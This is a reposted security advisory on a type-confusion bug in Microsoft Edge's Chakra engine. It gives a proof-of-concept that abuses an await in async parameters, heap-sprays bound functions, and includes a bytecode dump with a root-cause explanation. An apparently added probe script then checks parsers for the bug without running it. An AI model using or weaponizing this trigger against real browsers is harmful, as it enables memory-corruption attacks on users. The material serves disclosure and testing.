
TheHackerWorld Official

Microsoft Edge Chakra JIT - Parameter Scope Parsing Type Confusion

// PoC:

// Invalid JavaScript: an await-expression inside the formal parameters of an
// async function (here, inside a class computed key in a default value) must
// be an early SyntaxError, but Chakra's parser accepts it.
async function trigger(a = class b {
    [await 1]() {
    }
}) {
}

// Heap spray: allocate many bound-function objects carrying controlled bound
// arguments (0x1234) before the incorrectly generated bytecode runs.
let spray = [];
for (let i = 0; i < 100000; i++) {
    spray.push(parseFloat.bind(1, 0x1234, 0x1234, 0x1234, 0x1234));
}

trigger();

/*
The PoC is invalid JavaScript, but Chakra does parse it without any exception and generates incorrect bytecode from that.

Here's the generated bytecode.

Function trigger ( (#1.1), #2) (In0, In1) (size: 36 [34])
      18 locals (8 temps from R10), 5 inline cache
    Constant Table:
    ======== =====
     R1 LdRoot    
     R2 LdC_A_I4   int:1 
     R3 Ld_A       (undefined)
     R4 LdFalse   
    
    Implicit Arg Ins:
    ======== === ===
     R5 ArgIn_A    In1
    
    0000   InitUndecl           R6 
    0002   TryCatch             x:004c (  71) 


  Line   1: a = class b {
  Col   24: ^
    0005   BrSrNeq_A            x:0048 (  62)  R5  R3 
    000a   NewScFunc            R13 = b()
    000d   InitClass            R13 
    0012   ProfiledLdFld        R14 = R13.prototype #0 <0> 
    0016   SetHomeObj           R13  R14 
    001b   NewScObjectSimple    R9 
    001d   ProfiledStFld        R9.value = R2 #1 <1> 
    0021   ProfiledStFld        R9.done = R4 #2 <2> 
    0025   Yield                R9  R9   <<----------------------------------------------- (a)
    0028   ResumeYield          R15  R9 
    002b   NewScFunc            R16 = b.prototype[]()
    002e   SetComputedNameVar   R16  R15 
    0033   ProfiledLdFld        R14 = R13.prototype #0 <0> 
    0037   InitClassMemberComputedName R14[R15] = R16
    003d   SetHomeObj           R16  R14 
    0042   InitConst            R6  R13 
    0045   Ld_A                 R5  R13 
    0048   Leave               
    0049   Br                   x:0074 (  40) 
    004c   Catch                R10 
    004e   Nop                 
    004f   ProfiledLdRootFld    R11 = root.Promise #4 <4> 
    0055   ProfiledLdMethodFld  R12 = R11.reject #3 <3> 
    0059   StartCall            ArgCount: 2
    005c   ArgOut_A             Out0 = R11 
    005f   ArgOut_A             Out1 = R10 
    0062   ProfiledCallIWithICIndex R12 = R12(ArgCount: 2) <3>  <0> 
    006c   Ld_A                 R0  R12 
    006f   Leave               
    0070   Br                   x:0076 (   3) 
    0073   Leave               
    0074   LdUndef              R0 


  Line   5: }
  Col    1: ^
    0076   Ret              

Yield operations should not be performed under a try-catch block, but incorrectly generated bytecode allowed it at (a). This will lead to type confusion in the InterpreterStackFrame::OP_ResumeYield method.
*/
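The root cause above is a parser that fails to apply the early error for an await-expression in an async function's parameter scope. The following probe, added here and not part of the original advisory or the Chakra code base, feeds the PoC source and two constructed control sources to the host engine's parser (via the Function constructor, which parses but never invokes the result) and reports whether the engine behaves like a conformant parser: the PoC must be rejected with a SyntaxError, while the same shape with `await` moved into the function body, or removed from the default parameter, must be accepted. The function names `probeParse`, `runProbes` and `engineIsConformant` are my own.

```javascript
// Added example (not from the original advisory): probe the host engine's
// parser with the Chakra PoC source and constructed control cases.

// The PoC from the advisory, as a string so it is parsed but never run.
const POC_SOURCE = `
async function trigger(a = class b {
    [await 1]() {
    }
}) {
}
`;

// Constructed control cases: the same shape with the await-expression taken
// out of the parameter scope. A conformant parser accepts both, because
// class computed keys inherit the [Await] context of the enclosing function,
// and in the body of an async function that context permits await.
const CONTROL_SOURCES = {
  noAwaitInParams: `async function f(a = class b { [1]() {} }) {}`,
  awaitInBody:     `async function f() { class b { [await 1]() {} } }`,
};

// Parse a source text without executing it. Function() compiles the text as a
// function body and returns the function; we discard it, so even an engine
// that wrongly accepts the PoC does not run the trigger.
function probeParse(source) {
  try {
    new Function(source);
    return { accepted: true, error: null };
  } catch (e) {
    return { accepted: false, error: e.name };
  }
}

// Run every probe and return a map of case name -> parse result.
function runProbes() {
  const results = { poc: probeParse(POC_SOURCE) };
  for (const [name, src] of Object.entries(CONTROL_SOURCES)) {
    results[name] = probeParse(src);
  }
  return results;
}

// True when the engine rejects the PoC with a SyntaxError (the early error
// for an await-expression in async formal parameters) and accepts the
// controls; a parser with the Chakra bug would report the PoC as accepted.
function engineIsConformant() {
  const r = runProbes();
  return !r.poc.accepted && r.poc.error === "SyntaxError" &&
         r.noAwaitInParams.accepted && r.awaitInBody.accepted;
}

console.log(runProbes());
console.log("conformant parser:", engineIsConformant());
```

Run it under any engine you want to check (for example `node probe.js`). An engine that prints `poc: { accepted: true, ... }` is parsing the parameter-scope await exactly the way the advisory describes for Chakra, and is the one to look at for the follow-on bytecode generation problem.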
            
